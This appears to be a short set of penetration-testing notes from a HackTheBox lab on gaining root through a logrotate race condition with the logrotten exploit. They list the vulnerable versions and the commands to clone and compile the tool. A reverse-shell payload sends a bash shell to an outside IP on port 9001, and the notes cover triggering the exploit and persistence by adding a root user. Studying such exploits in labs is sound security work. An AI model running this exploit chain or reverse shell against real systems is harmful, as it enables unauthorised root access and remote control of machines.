Logrotate

To exploit logrotate, we need some requirements that we have to fulfill.

1. we need write permissions on the log files

2. logrotate must run as a privileged user or root

3. vulnerable versions:

   • 3.8.6

   • 3.11.0

   • 3.15.0

   • 3.18.0

Version

$ logrotate --version
logrotate 3.11.0

Logrotten

GitHub - whotwagner/logrottenGitHub

$ git clone https://github.com/whotwagner/logrotten.git
$ cd logrotten
$ gcc logrotten.c -o logrotten

echo 'bash -i >& /dev/tcp/10.10.14.2/9001 0>&1' > payload

Which option logrotate uses

$ grep "create\|compress" /etc/logrotate.conf | grep -v "#"

create

./logrotten -p ./payload /tmp/tmp.log

Example

2 access.log writable

Run exploit and trigger logrotate by writing on file

htb-student@ubuntu:~/backups$ echo 'f*' > access.log

For persistance: /bin/dash -p

Also possible to create a root user and log in with it. See references

Resources

Linux PrivEsc with Logrotate UtilityMedium

HackTheBox – BookIvan's IT learning blog